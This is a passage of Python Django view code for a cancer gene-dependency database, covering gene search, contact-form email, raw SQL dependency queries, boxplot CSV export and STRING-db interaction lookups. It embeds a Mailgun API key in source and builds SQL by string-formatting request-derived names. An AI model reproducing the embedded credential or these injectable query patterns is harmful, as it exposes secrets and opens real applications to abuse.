\"value\":\"ERBB3\",\"label\":\"ERBB3, ....\"},\n # ]\n\n # For each driver gene, the autocomplete box with display the 'label' then the 'value'.\n \n if name_contains == '':\n # Needs: (is_driver=True), not just: (is_driver)\n drivers = Gene.objects.filter(is_driver=True)\n else: \n # drivers = Gene.objects.filter(is_driver=True, gene_name__icontains=name_contains)\n # To search in both: 'gene_name' or 'prevname_synonyms', need to use the 'Q' object:\n drivers = Gene.objects.filter(is_driver=True).filter( Q(gene_name__icontains=name_contains) | Q(prevname_synonyms__icontains=name_contains) ) # could add: | Q(full_name__icontains=name_contains)\n\n results = []\n for d in drivers.order_by('gene_name'):\n results.append({\n 'id': d.gene_name,\n 'value': d.gene_name,\n 'label': d.gene_name + ' : ' + d.full_name + ' : ' + d.prevname_synonyms\n }) \n \n # For a simpler result set could use, eg: \n # results = list(Gene.objects.filter(gene_name__icontains=name_contains).values('gene_name'))\n \n return JsonResponse(results, safe=False) # needs 'safe=false' as results is an array, not dictionary.\n\n\ndef is_valid_ip(ip_address):\n \"\"\" Check validity of an IP address \"\"\"\n try:\n ip = ipaddress.ip_address(u'' + ip_address)\n return True\n except ValueError as e:\n return False\n \ndef get_ip_address_from_request(request):\n \"\"\" Makes the best attempt to get the client's real IP or return the loopback \"\"\" \n # Based on: \"easy_timezones.utils.get_ip_address_from_request\": https://github.com/Miserlou/django-easy-timezones\n \n # On PythonAnywhere the loadbalancer puts the IP address received into the \"X-Real-IP\" header, and also passes the \"X-Forwarded-For\" header as a comma-separated list of IP addresses. The 'REMOTE_ADDR' contains load-balancer address.\n \n PRIVATE_IPS_PREFIX = ('10.', '172.', '192.', '127.')\n ip_address = ''\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR', '')\n if x_forwarded_for and ',' not in x_forwarded_for:\n if not x_forwarded_for.startswith(PRIVATE_IPS_PREFIX) and is_valid_ip(x_forwarded_for):\n ip_address = x_forwarded_for.strip()\n else:\n ips = [ip.strip() for ip in x_forwarded_for.split(',')]\n for ip in ips:\n if ip.startswith(PRIVATE_IPS_PREFIX):\n continue\n elif not is_valid_ip(ip):\n continue\n else:\n ip_address = ip\n break\n if not ip_address:\n x_real_ip = request.META.get('HTTP_X_REAL_IP', '') # PythonAnywhere load-balancer puts the real IP in this 'HTTP_X_REAL_IP'.\n if x_real_ip:\n if not x_real_ip.startswith(PRIVATE_IPS_PREFIX) and is_valid_ip(x_real_ip):\n ip_address = x_real_ip.strip()\n if not ip_address:\n remote_addr = request.META.get('REMOTE_ADDR', '') # On PythonAnywhere this is the load-balancer address.\n if remote_addr:\n if not remote_addr.startswith(PRIVATE_IPS_PREFIX) and is_valid_ip(remote_addr):\n ip_address = remote_addr.strip()\n if not ip_address:\n ip_address = '127.0.0.1'\n return ip_address\n \n \n \ndef send_an_email(emailfrom, emailto, emailreplyto, subject, text):\n \"\"\" Uses the 'mailgun.com' service (as free PythonAnywhere accounts don't have SMTP access) \"\"\"\n # mailgun.com records email in your logs: https://mailgun.com/cp/log \n # Better to keep this API auth key in a separate file, not on github:\n response = requests.post(\n \"https://api.mailgun.net/v3/sandboxfb49cd4805584358bdd5ee8d96240a09.mailgun.org/messages\",\n auth=(\"api\", \"key-ff52850192b21b271260779529ebd491\"),\n data={\"from\": emailfrom,\n \"to\": emailto,\n \"h:Reply-To\": emailreplyto,\n \"subject\": subject,\n \"text\": text\n })\n if not response.ok: print(\"Failed to send email as:\", response.content)\n return response.ok\n \n\n \ndef log_comment(request):\n \"\"\" Log and email comments/queries from the 'contacts' page \"\"\"\n # The user's input data is send by an HTML POST, not by Django url parameters as the message can be long:\n name = request.POST.get('name', '')\n emailreplyto = request.POST.get('email', '')\n comment = request.POST.get('comment', '')\n \n # Optional fields, which are currently commented out on the html template:\n # interest = request.POST.get('interest', '')\n # human = request.POST.get('human', '') # Result of a simple maths test, to check user is not a web spam robot.\n \n # To store the timezone: in \"cgdd/settings.py\" set: USE_TZ=True \n date = timezone.now()\n \n ip = get_ip_address_from_request(request)\n \n c = Comment.objects.create(name=name, email=emailreplyto, comment=comment, ip=ip, date=date)\n \n # Should probably check for email header injection attacks: https://www.reddit.com/r/Python/comments/15n6dw/sending_emails_through_python_and_gmail/\n # But mailgun probably checks for this.\n\n emailfrom=emailreplyto # Needs to be a valid email address or might give an exception?\n\n # The emailto address needs to be authorised on the mailgun.com \n emailto=\"cancergenetics@ucd.ie\" # or: \"Cancer Genetics \"\n #emailto=\"sbridgett@gmail.com\" # or: \"Stephen \" for testing.\n\n subject=\"Cgenetics Comment/Query: \"+str(c.id)\n\n # Datetime formatting: https://docs.python.org/3.5/library/datetime.html#strftime-strptime-behavior\n text = \"From: \"+name+\" \"+emailreplyto+\"\\nDate: \" + date.strftime(\"%a %d %b %Y at %H:%M %Z\") + \"\\n\\n\"+comment\n # https://docs.djangoproject.com/en/1.9/topics/i18n/timezones/\n \n email_sent = \"Email sent to cgenetics\" if send_an_email(emailfrom=emailfrom, emailto=emailto, emailreplyto=emailreplyto, subject=subject, text=text) else \"Failed to send email, but your message was saved in our comments database.\" # To the email could add: interest=interest\n\n context = {'name': name, 'email': emailreplyto, 'comment': comment, 'date': date, 'email_sent': email_sent}\n return render(request, 'gendep/log_comment.html', context, content_type=html_mimetype)\n \n\ndef get_histotype_full_name(histotype_name):\n \"\"\" Returns the human readable proper-case tissue name, eg: \n if input is 'PANCAN' returns 'Pan cancer', or if input 'SOFT_TISSUE' returns 'Soft tissue' \"\"\"\n if histotype_name == \"ALL_HISTOTYPES\":\n return \"All tissues\"\n else:\n return Dependency.histotype_full_name(histotype_name)\n\n\ndef get_study(study_pmid):\n \"\"\" Returns short study name (First author and year), for an imput Pub-Med Id \"\"\"\n if study_pmid == \"ALL_STUDIES\":\n return \"ALL_STUDIES\"\n try:\n study = Study.objects.get(pmid=study_pmid)\n except ObjectDoesNotExist: # Not found by the objects.get()\n study = None\n return study \n\n\n# def get_gene(gene_name):\ndef get_gene(entrez_id):\n \"\"\" Returns the Gene object (row from the Gene table) for the input gene_name (eg. 'ERBB2') \"\"\"\n # gene = None if gene_name == '' else Gene.objects.get(gene_name=gene_name) \n # if gene_name=='':\n if entrez_id=='':\n return None\n try:\n #gene = Gene.objects.get(gene_name=gene_name)\n gene = Gene.objects.get(entrez_id=entrez_id)\n except ObjectDoesNotExist: # gene_name not found by the Gene.objects.get()\n gene = None\n return gene\n \n \ndef build_dependency_query(search_by, entrez_id, histotype_name, study_pmid, wilcox_p=0.05, order_by='wilcox_p', select_related=None): # Now replaced by rawSQL query below.\n \"\"\" Builds the query used to extract the requested dependencies.\n search_by: 'driver' or 'target'\n entrez_id: must be sepcified and in the Genes table\n histotype_name: can be \"ALL_HISTOTYPES\" or a histotype in the model\n study_pmid: can be \"ALL_STUDIES\" or a study pubmed id in the Study table\n wilcox_p: the Dependency table only contains the rows with wilcox_p <=0.05 so must be same or less than 0.05\n order_by: defaults to wilcox_p, but could be 'target_id' or 'effect_size', etc\n select_related: can be None, or a string, or a list of strings (eg: ['driver__inhibitors', 'driver__ensembl_protein_id'] to efficiently select the inhibitors and protein_ids from the related Gene table in the one SQL query, rather than doing multiple SQL sub-queries later)\n \"\"\"\n error_msg = \"\"\n\n # Now changed to using entrez_id in the Dependency table so need to check Gene table for name (or send entrez_id from browser): \n if entrez_id == \"\":\n error_msg += 'Gene name is empty, but must be specified'\n return error_msg, None\n\n # Using driver_id=entrez_id (or target_id=entrez_id) avoids table join of (driver = gene):\n q = Dependency.objects.filter(driver_id=entrez_id) if is_search_by_driver(search_by) else Dependency.objects.filter(target_id=entrez_id)\n \n # As Query Sets are lazy, so can incrementally build the query, then it is evaluated once at end when it is needed:\n if histotype_name != \"ALL_HISTOTYPES\":\n q = q.filter( histotype = histotype_name ) # Correctly uses: =histotype_name, not: =histotype_full_name\n\n if study_pmid != \"ALL_STUDIES\":\n q = q.filter( study_id = study_pmid ) # Could use: (study = study) but using study_id should be more efficiewnt as no table join needed.\n\n # As the results are already filtered by R for wilcox_P<=0.05 then don't actually need to filter on this wilcox_p <= 0.05:\n # q = q.filter(wilcox_p__lte = wilcox_p) # Only list significant hits (ie: p<=0.05). '__lte' means 'less than or equal to'\n\n print(\"build_dependency Query SQL:\",q.query)\n print(\"build_dependency select_related:\",select_related)\n \n if select_related is not None: \n if isinstance(select_related, str) and select_related != '':\n q = q.select_related(select_related)\n elif isinstance(select_related, list) or isinstance(select_related, tuple):\n for column in select_related:\n q = q.select_related(column)\n else:\n error_msg += \" ERROR: *** Invalid type for 'select_related' %s ***\" %(type(select_related))\n print(error_msg)\n \n if order_by != None and order_by != '':\n q = q.order_by(order_by) # usually 'wilcox_p', but could be: order_by('target_id') to order by target gene name\n\n return error_msg, q\n\n\n# Show entrez_id be the filter now instead of gene_name?\ndef build_rawsql_dependency_query(search_by, entrez_id, histotype_name, study_pmid, query_type, order_by='wilcox_p'): # wilcox_p=0.05, select_related=None): \n \"\"\" Builds raw SQL query, which permits use of AS in SQL, and more efficient. https://docs.djangoproject.com/en/1.10/topics/db/sql/ \n and overcomes problem that the latest Django 1.10 has with 'selected_related': https://code.djangoproject.com/ticket/24687 \n and http://eboreimeoikeh.com/zealcreationz.com/django/docs/releases/1.10.txt and http://fossies.org/diffs/Django/1.9.8_vs_1.10/tests/select_related/tests.py-diff.html \"\"\"\n # As the results are already filtered by R for wilcox_P<=0.05 then don't actually need to filter on this wilcox_p <= 0.05\n\n error_msg = ''\n\n filter = \"D.%s = %%s\" %(search_by) # AND D.wilcox_p <= %%s\n # Now changed to using entrez_id in the Dependency table so need to check Gene table for name (or send entrez_id from browser):\n # params = [gene_name] # , wilcox_p\n params = [entrez_id] # , wilcox_p\n\n # filter = \"D.gene_name = %%s\" # AND D.wilcox_p <= %%s\n\n if histotype_name != \"ALL_HISTOTYPES\":\n filter += \" AND D.histotype = %s\" # Correctly uses: =histotype_name, not: =histotype_full_name \n params.append(histotype_name)\n\n if study_pmid != \"ALL_STUDIES\":\n filter += \" AND D.pmid = %s\" # Could use: (study = study) but using study_id should be more efficient as no table join needed.\n params.append(study_pmid)\n\n select = 'target' if search_by=='driver' else 'driver'\n\n columns = \"D.id, D.%s AS entrez_id, D.wilcox_p, D.effect_size, D.zdiff, D.interaction, D.pmid, D.multi_hit\" %(select) # Raw query must include the primary key (D.id). Should entrez_id be added now as is primary key to Gene table now?\n\n # related_columns = \", G.inhibitors, G.ensembl_protein_id\"\n # related_join = \" INNER JOIN gendep_gene G ON (D.%s = G.gene_name)\" %(select) # Used for both query_types.\n related_columns = \", G.gene_name, G.inhibitors, G.ensembl_protein_id\"\n related_join = \" INNER JOIN gendep_gene G ON (D.%s = G.entrez_id)\" %(select) # Used for both query_types.\n\n if query_type == 'dependency_gene_study':\n# related_columns += \", G.full_name, G.entrez_id, G.ensembl_id, G.prevname_synonyms, S.short_name, S.experiment_type, S.title\" # don't need 'study__pmid' (as is same as d.study_id)\n related_columns += \", D.histotype, G.full_name, G.ensembl_id, G.prevname_synonyms, S.short_name, S.experiment_type, S.title\" # don't need 'study__pmid' (as is same as d.study_id)\n related_join += \" INNER JOIN gendep_study S ON (D.pmid = S.pmid)\"\n elif query_type != 'dependency_gene':\n error_msg += \" ERROR: *** Invalid 'query_type': %s ***\" %(query_type)\n\n # Not searching for: gendep_dependency.driver, gendep_dependency.mutation_type, gendep_dependency.boxplot_data, etc\n\n rawsql = (\"SELECT \" + columns + related_columns +\n \" FROM gendep_dependency D\" + related_join +\n \" WHERE (%s) ORDER BY D.%s ASC\") %(filter, order_by)\n\n print(\"build_rawsql:\",rawsql)\n return error_msg, Dependency.objects.raw(rawsql, params)\n\n \n\ndef gene_ids_as_dictionary(gene):\n \"\"\" To return info about alternative gene Ids as dictionary, for an JSON object for AJAX \"\"\"\n return {\n 'gene_name': gene.gene_name,\n 'entrez_id': gene.entrez_id,\n 'ensembl_id': gene.ensembl_id,\n 'ensembl_protein_id': gene.ensembl_protein_id,\n 'vega_id': gene.vega_id,\n 'omim_id': gene.omim_id,\n 'hgnc_id': gene.hgnc_id,\n 'cosmic_id': gene.cosmic_id,\n 'uniprot_id': gene.uniprot_id\n }\n\ndef gene_info_as_dictionary(gene):\n \"\"\" To return info about the gene as a JSON object for AJAX \"\"\"\n return { \n 'gene_name': gene.gene_name,\n 'full_name': gene.full_name,\n 'synonyms': gene.prevname_synonyms,\n 'ids': gene_ids_as_dictionary(gene),\n }\n \n\n# Should entrez_id be a parameter now, as is primary key? \ndef get_dependencies(request, search_by, entrez_id, histotype_name, study_pmid):\n \"\"\" Fetches the dependency data from cache (if recent same query) or database, for the main search result webpage.\n After \"Search\" button on the \"index.html\" page is pressed an AJAX requst sends four fields: search_by, entrez_id, histotype, and study_pmid.\n For paginated table, could add [start_row, and number_of_rows to return]\n Returns JSON formatted data for the dependency search result table, or an error message in JSON format.\n GET request is faster than POST, as POST makes two http requests, GET makes one, the Django url parameters are a GET request.\n \"\"\"\n print(\"In get_dependencies: \",request, search_by, entrez_id, histotype_name, study_pmid)\n \n timing_array = [] # Using an array to preserve order of times on output.\n start = datetime.now()\n \n ajax_results_cache_version = '3' # version of the data in the database and of this JSON format. Increment this on updates that change the database data or this JSON format. See: https://docs.djangoproject.com/en/1.9/topics/cache/#cache-versioning\n \n # Avoid storing a 'None' value in the cache as then difficult to know if was a cache miss or is value of the key\n # cache_key = search_by+'_'+gene_name+'_'+histotype_name+'_'+study_pmid+'_v'+ajax_results_cache_version\n cache_key = search_by+'_'+entrez_id+'_'+histotype_name+'_'+study_pmid+'_v'+ajax_results_cache_version\n cache_data = cache.get(cache_key, 'not_found') # To avoid returning None for a cache miss.\n if cache_data != 'not_found': \n # start = get_timing(start, 'Retrieved from cache', timing_array)\n # The 'timings': timing_array in the cached version is saved from the actual previous query execution, is not the timing for retrieving from the cache.\n return HttpResponse(cache_data, json_mimetype) # version=ajax_results_cache_version)\n\n search_by_driver = is_search_by_driver(search_by) # otherwise is by target\n select_related = [ 'target__inhibitors', 'target__ensembl_protein_id' ] if search_by_driver else [ 'driver__inhibitors', 'driver__ensembl_protein_id' ]\n\n #print(\"get_drivers(<#request#>)_dependency_query:\", \"search_by:\",search_by, \"gene_name:\",gene_name, \"histotype_name:\",histotype_name, \"study_pmid:\",study_pmid, \"select_related:\",select_related)\n print(\"build_dependency_query:\", \"search_by:\",search_by, \"entrez_id:\",entrez_id, \"histotype_name:\",histotype_name, \"study_pmid:\",study_pmid, \"select_related:\",select_related) \n\n RAW = True\n if RAW:\n error_msg, dependency_list = build_rawsql_dependency_query(search_by, entrez_id, histotype_name, study_pmid, order_by='wilcox_p', query_type='dependency_gene') \n else:\n # Specify 'select_related' columns on related tables, otherwise the template will do a separate SQL query for every dependency row to retrieve the driver/target data (ie. hundreds of SQL queries on the Gene table)\n # Can add more select_related columns if needed, eg: for target gene prevname_synonyms: target__prevname_synonyms \n # error_msg, dependency_list = build_dependency_query(search_by, gene_name, histotype_name, study_pmid, order_by='wilcox_p', select_related=select_related) \n error_msg, dependency_list = build_dependency_query(search_by, entrez_id, histotype_name, study_pmid, order_by='wilcox_p', select_related=select_related)\n \n if error_msg != '': return json_error(\"Error: \"+error_msg)\n \n \n print(\"Query SQL:\",dependency_list.query)\n \n # gene = get_gene(gene_name)\n gene = get_gene(entrez_id)\n # if gene is None: return json_error(\"Error: Gene '%s' NOT found in Gene table\" %(gene_name))\n if gene is None: return json_error(\"Error: Gene entrez_id '%s' NOT found in Gene table\" %(entrez_id))\n \n # Only need current_url to include it in title/browser tab on hoover, for testing.\n #current_url = request.META['HTTP_HOST'] # or: request.META['SERVER_NAME']\n\n start = get_timing(start, 'Query setup', timing_array)\n \n results = []\n csv = ''\n div = ';' # Using semicolon as the div, as comma may be used to separate the inhibitors\n count = 0\n \n # \"The 'iterator()' method ensures only a few rows are fetched from the database at a time, saving memory, but aren't cached if needed again in this function. This iteractor version seems slightly faster than non-iterator version.\n# for d in dependency_list.iterator(): <-- RawQuery doesn't have iterator()\n for d in dependency_list:\n count += 1\n if RAW:\n #interaction = d.interaction\n #if interaction is None: interaction = '' # shouldn't be None, as set by ' add_ensembl_proteinids_and_stringdb.py' script to ''.\n \n #interation_protein_id = d.target.ensembl_protein_id if search_by_driver else d.driver.ensembl_protein_id\n #if interation_protein_id is None: interation_protein_id = '' # The ensembl_protein_id might be empty.\n #interaction += '#'+interation_protein_id # Append the protein id so can use this to link to string-db.org\n\n #inhibitors = d.target.inhibitors if search_by_driver else d.driver.inhibitors\n #if inhibitors is None: inhibitors = '' # shouldn't be None, as set by 'drug_inhibitors.py' script to ''.\n \n # For driver or target below, the '_id' suffix gets the underlying gene name, rather than the foreign key Gene object, so more efficient as no SQL join needed: https://docs.djangoproject.com/en/1.9/topics/db/optimization/#use-foreign-key-values-directly\n # Similarily 'study_id' returns the underlying pmid number from Dependency table rather than the Study object.\n # wilcox_p in scientific format with no decimal places (.0 precision), and remove python's leading zero from the exponent.\n results.append([\n d.gene_name, # WAS: d.target_id if search_by_driver else d.driver_id,\n # Optionally could add: d.entrez_id,\n format(d.wilcox_p, \".0e\").replace(\"e-0\", \"e-\"),\n format(d.effect_size*100, \".1f\"), # As a percentage with 1 decimal place\n format(d.zdiff,\".2f\"), # Usually negative. two decomal places\n d.study_id,\n d.multi_hit,\n d.interaction + '#' + d.ensembl_protein_id,\n d.inhibitors,\n d.histotype if histotype_name == \"ALL_HISTOTYPES\" else '' # Only need to send the histotype column when all_histotypes, (as otherwise when specific histotype is given in search then only rows with that histotype will be returned, so webpage will know histotype from query)\n ])\n \n else: # Not RAW sql \n interaction = d.interaction\n if interaction is None: interaction = '' # shouldn't be None, as set by ' add_ensembl_proteinids_and_stringdb.py' script to ''.\n \n interation_protein_id = d.target.ensembl_protein_id if search_by_driver else d.driver.ensembl_protein_id\n if interation_protein_id is None: interation_protein_id = '' # The ensembl_protein_id might be empty.\n interaction += '#'+interation_protein_id # Append the protein id so can use this to link to string-db.org\n\n inhibitors = d.target.inhibitors if search_by_driver else d.driver.inhibitors\n if inhibitors is None: inhibitors = '' # shouldn't be None, as set by 'drug_inhibitors.py' script to ''.\n \n # For driver or target below, the '_id' suffix gets the underlying gene name, rather than the foreign key Gene object, so more efficient as no SQL join needed: https://docs.djangoproject.com/en/1.9/topics/db/optimization/#use-foreign-key-values-directly\n # Similarily 'study_id' returns the underlying pmid number from Dependency table rather than the Study object.\n # wilcox_p in scientific format with no decimal places (.0 precision), and remove python's leading zero from the exponent.\n results.append([\n d.target_id if search_by_driver else d.driver_id,\n format(d.wilcox_p, \".0e\").replace(\"e-0\", \"e-\"),\n format(d.effect_size*100, \".1f\"), # As a percentage with 1 decimal place\n format(d.zdiff,\".2f\"), # Usually negative. two decomal places\n d.study_id,\n d.multi_hit,\n interaction,\n inhibitors, # Formatted above\n d.histotype if histotype_name == \"ALL_HISTOTYPES\" else '' # Only need to send the histotype column when all_histotypes, (as otherwise when specific histotype is given in search then only rows with that histotype will be returned, so webpage will know histotype from query)\n ])\n \n\n start = get_timing(start, 'Dependency results', timing_array)\n \n # results_column_names = ['Target','Wilcox_p','Effect_size','ZDiff','Histotype','Study_pmid','Inhibitors','Interactions'] # Could add this to the returned 'query_info'\n\n query_info = {'search_by': search_by,\n 'gene_entrez': entrez_id,\n 'gene_name': gene.gene_name,\n 'gene_full_name': gene.full_name,\n 'gene_synonyms': gene.prevname_synonyms,\n 'gene_alteration_considered': gene.alteration_considered, # alteration_considered only applies to driver genes.\n 'histotype_name': histotype_name,\n 'study_pmid': study_pmid,\n 'dependency_count': count, # should be same as: dependency_list.count(), but dependency_list.count() could be another SQL query. # should be same as number of elements passed in the results array.\n }\n # 'current_url': current_url # No longer needed.\n \n data = json.dumps({\n 'success': True,\n 'timings': timing_array,\n 'query_info': query_info,\n 'gene_ids': gene_ids_as_dictionary(gene),\n 'results': results\n }, separators=[',',':']) # The default separators=[', ',': '] includes whitespace which I think make transfer to browser larger. As ensure_ascii is True by default, the non-asciii characters are encoded as \\uXXXX sequences, alternatively can set ensure_ascii to false which will allow unicode I think.\n \n start = get_timing(start, 'Json dump', timing_array) # Although too late to add this time to the json already encoded above.\n\n cache.set(cache_key, data, version=ajax_results_cache_version) # could use the add() method instead, but better to update anyway.\n # Could gzip the cached data (using GZip middleware's gzip_page() decorator for the view, or in code https://docs.djangoproject.com/en/1.9/ref/middleware/#module-django.middleware.gzip )\n # GZipMiddleware will NOT compress content if any of the following are true:\n # - The content body is less than 200 bytes long.\n # - The response has already set the Content-Encoding header.\n # - The request (the browser) hasn’t sent an Accept-Encoding header containing gzip.\n # Another option is using cache_control() permit browser caching by setting the Vary header: https://docs.djangoproject.com/en/1.9/topics/cache/#using-vary-headers\n # \"(Note that the caching middleware already sets the cache header’s max-age with the value of the CACHE_MIDDLEWARE_SECONDS setting. If you use a custom max_age in a cache_control decorator, the decorator will take precedence, and the header values will be merged correctly.)\"\n # https://www.pythonanywhere.com/forums/topic/376/\n # and example of gzip using flask: https://github.com/closeio/Flask-gzip\n # https://github.com/closeio/Flask-gzip/blob/master/flask_gzip.py\n\n #print(timing_array) # To django console/server log\n return HttpResponse(data, content_type=json_mimetype) # As data is alraedy in json format, so not using JsonResponse(data, safe=False) which would try to convert it to JSON again.\n \n\n\ndef get_boxplot(request, dataformat, driver_name, target_name, histotype_name, study_pmid):\n \"\"\" Returns data for plotting the boxplots, in JSON or CSV format\n The 'target_variant' parameter is no longer used for the Achilles data, as only the target_variant with the best wilcox_p value is stored in the Dependency table \"\"\"\n try: \n # d = Dependency.objects.get(driver_id=driver_name, target_id=target_name, histotype=histotype_name, study_id=study_pmid)\n d = Dependency.objects.get(driver__gene_name=driver_name, target__gene_name=target_name, histotype=histotype_name, study_id=study_pmid)\n \n except ObjectDoesNotExist: # ie. not found by the objects.get()\n error_msg = \"Error, Dependency: driver='%s' target='%s' tissue='%s' study='%s' NOT found in Dependency table\" %(driver_name, target_name, histotype_name, study_pmid)\n if dataformat[:4] == 'json': # for request 'jsonplot' or 'jsonplotandgene'\n return json_error(error_msg)\n else: \n return plain_error(error_msg)\n \n if dataformat == 'csvplot':\n return HttpResponse(d.boxplot_data, content_type=csv_mimetype)\n\n if dataformat == 'jsonplot':\n return JsonResponse({'success': True, 'boxplot': d.boxplot_data}, safe=False)\n \n if dataformat == 'jsonplotandgene': # when browser doesn't already have target gene_info and ncbi_summary cached.\n try:\n gene = Gene.objects.get(gene_name=target_name)\n gene_info = gene_info_as_dictionary(gene);\n gene_info['ncbi_summary'] = gene.ncbi_summary # To include the gene's ncbi_summary\n return JsonResponse( { 'success': True,\n 'gene_info': gene_info,\n 'boxplot': d.boxplot_data },\n safe=False )\n except ObjectDoesNotExist: # Not found by the objects.get() \n return json_error( \"Error, Gene: target='%s' NOT found in Gene table\" %(target_name) )\n\n elif dataformat=='csv' or dataformat=='download': \n # 'csv' is for users to request the boxplot data via API\n # 'download' to for the 'Download as CSV' button on the SVG boxplots\n lines = d.boxplot_data.split(';')\n \n lines[0] = \"Tissue,CellLine,Zscore,Altered\";\n # This first line is the count, range, and boxplot_stats.\n \n # As this range and boxplot_stats are now calculated by the Javasscript in svg_boxplots.js, this line can be removed from future R output, so in future we need to prepend to the list, rather than replacing the first line here:\n # lines.insert(0, \"Tissue,CellLine,Zscore,Altered\")\n # or just: \n # response = HttpResponse(\"Tissue,CellLine,Zscore,Altered\\n\" + (d.boxplot_data.replace(\";\",\"\\n\")), content_type=csv_mimetype)\n response = HttpResponse(\"\\n\".join(lines), content_type=csv_mimetype)\n if dataformat=='download':\n # Add to the HttpResponse object with the CSV/TSV header and downloaded filename:\n dest_filename = ('%s_%s_%s_pmid%s.csv' %(driver_name,target_name,histotype_name,study_pmid)).replace(' ','_') # To also replace any spaces with '_'\n # NOTE: Using .csv as Windows (and Mac) file associations will then know to open file with Excel, whereas if is .tsv then Windows won't open it with Excel.\n response['Content-Disposition'] = 'attachment; filename=\"%s\"' %(dest_filename)\n return response\n \n else:\n print(\"*** Invalid dataformat requested for get_boxplot() ***\")\n return html_error(\"Error, Invalid dataformat '\"+dataformat+\"' requested for get_boxplot()\")\n \n \n \ndef stringdb_interactions(required_score, protein_list):\n \"\"\" Retrieve list of protein_ids with interaction of >=required_score\n 'required_score' is typically 400, or 700 (for 40% or 70% confidence)\n 'protein_list' is ensembl protein_ids separated with semicolons ';'\n NOTE: The pythonanywhere.com free account blocks requests to servers not on their whitelist. String-db.org has now been added to their whitelist, so this function works ok on free or paid accounts.\n This function creates a request in format: http://string-db.org/api/psi-mi-tab/interactionsList?network_flavor=confidence&limit=0&required_score=700&identifiers=9606.ENSP00000269571%0D9606.ENSP00000357883%0D9606.ENSP00000345083\n \"\"\"\n \n stringdb_options=\"network_flavor=confidence&species=9606&limit=0&required_score=\"+required_score; \n # The online interactive stringdb uses: \"required_score\" 400, and \"limit\" 0 (otherwise by default string-db will add 10 more proteins). Optionally add parameter: &additional_network_nodes=0\n \n protein_list = protein_list.replace(';', '%0D') # Replace semicolon with the url encoded newline character that String-db expects between protein ids.\n\n url = \"http://string-db.org/api/psi-mi-tab/interactionsList?\"+stringdb_options+\"&identifiers=\"+protein_list;\n \n # For very large result sets could use streaming: http://stackoverflow.com/questions/16870648/python-read-website-data-line-by-line-when-available\n # import requests\n # r = requests.get(url, stream=True)\n # for line in r.iter_lines():\n # if line: print line\n\n req = Request(url)\n try:\n response = urlopen(req)\n except URLError as e:\n if hasattr(e, 'reason'): # The reason for this error. It can be a message string or another exception instance.\n if isinstance(e.reason, str):\n return False, \"We failed to reach a server: \" + e.reason\n else: \n raise e.reason\n elif hasattr(e, 'code'):\n return False, \"The server couldn't fulfill the request. Error code: \" + e.code\n else: # response is fine\n return True, response.read().decode('utf-8').rstrip().split(\"\\n\") # read() returns 'bytes' so need to convert to python string\n\n\ndef get_stringdb_interactions(request, required_score, protein_list=None):\n \"\"\" Returns the subset of protein protein_list that string-db reports have interactions with at least one other protein in the protein_list. This is to remove the unconnected proteins from the image \"\"\"\n \n # The request can be optionally be sent by an HTML GET or POST. POST means no limit to number of proteins sent, whereas GET or Django url() params are limited by length of the URL the webbrowser permits.\n if (protein_list is None) or (protein_list == ''):\n protein_list = post_or_get_from_request(request,'protein_list') \n \n # Fetch the subset of protein_list that have actual interactions with other proteins in the list:\n success, response = stringdb_interactions(required_score, protein_list)\n\n if not success: return plain_error('ERROR: '+response)\n\n if response=='': return PlainResponse(\"\") # No interacting proteins.\n # was: or response==\"\\n\", but the newline in empty response is rstrip'ed in stringdb_interactions()\n \n # Dictionary to check later if returned protein was in original list:\n initial_protein_dict = dict((protein,True) for protein in protein_list.split(';'))\n \n err_msg = '' \n final_protein_dict = dict()\n for line in response:\n if line == '': continue\n cols = line.rstrip().split(\"\\t\")\n if len(cols)<2: err_msg+=\"\\nNum cols = %d (but expected >=2) in line: '%s'\" %(len(cols),line.rstrip())\n \n for i in (0,1): # col[0] and col[1] are the pair of interacting proteins\n protein = cols[i].replace('string:', '') # as returned ids are prefixed with 'string:'\n if protein in initial_protein_dict: final_protein_dict[protein] = True\n else: err_msg+=\"\\n*** Protein%d returned '%s' is not in original list ***\" %(i+1,protein)\n \n if err_msg != '':\n print(err_msg)\n return plain_error('ERROR:'+err_msg)\n \n protein_list2 = ';'.join(final_protein_dict.keys())\n return PlainResponse(protein_list2)\n\n \n \ndef cytoscape(request, required_score, protein_list=None, gene_list=None):\n \"\"\" Displays the cytoscape network of protein interactions.\n This receives the protein_list (eg: \"9606.ENSP00000363021;9606.ENSP00000364815;9606.ENSP00000379888\") and their corresponding gene_names as gene_list (eg. \"RPA2;VARS;RPS8\").\n Could just receive:\n - receive protein_list and lookup the corresponding gene_names in Gene table\n - or receive gene_list and lookup the corresponding protein ids in the Gene table\n NOTE: There is a {% csrf_token %} in the index.html template for this cytoscape post form, so may beed to add a @csrf_protect decorator.\n \"\"\"\n if (protein_list is None) or (protein_list == ''):\n protein_list = post_or_get_from_request(request,'protein_list')\n\n if (gene_list is None) or (gene_list == ''):\n gene_list = post_or_get_from_request(request,'gene_list')\n \n success, response = stringdb_interactions(required_score, protein_list) # Fetches list of actual interactions\n \n if not success: return plain_error('ERROR: '+response)\n\n protein_list = protein_list.split(';')\n gene_list = gene_list.split(';')\n if len(protein_list) != len(gene_list):\n return plain_error('ERROR: lengths of gene_list and protein_list are different')\n\n # Create a dictionary to check later if returned protein was in original list, and what the gene_name was for that protein_id: \n initial_nodes = dict()\n for i in range(0, len(protein_list)):\n initial_nodes[protein_list[i]] = gene_list[i]\n \n nodes = dict() # The protein nodes for cytoscape\n edges = dict() # The edges for cytoscape\n err_msg = ''\n for line in response:\n # if line:\n cols = line.rstrip().split(\"\\t\")\n if len(cols)<2: \n err_msg += \"\\nNum cols = %d (expected >=2) in response line: '%s'\" %(len(cols),line.rstrip())\n continue\n \n protein1 = cols[0].replace('string:', '') # as ids are prefixed with 'string:'\n if protein1 in initial_nodes:\n nodes[ protein1.replace('9606.', '') ] = True # remove the human tax id\n else: err_msg += \"\\n*** Protein1 returned as '%s' is not in original list ***\" %(protein1)\n\n protein2 = cols[1].replace('string:', '')\n if protein2 in initial_nodes:\n nodes[ protein2.replace('9606.', '') ] = True\n else: err_msg += \"\\n*** Protein2 returned as '%s' is not in original list ***\" %(protein2)\n\n edge = protein1+'#'+protein2\n edge_reversed = protein2+'#'+protein1\n if edge not in edges and edge_reversed not in edges:\n edges[edge] = True\n\n # node_list = sorted(nodes)\n if err_msg != '':\n print(err_msg)\n return plain_error('ERROR:'+err_msg)\n\n # Convert node list of protein_ids, to list of gene_names:\n for protein in protein_list: # Can't use 'initial_nodes' here as it will be updated\n initial_nodes[protein.replace('9606.', '')] = initial_nodes.pop(protein)\n \n node_list = []\n for protein in 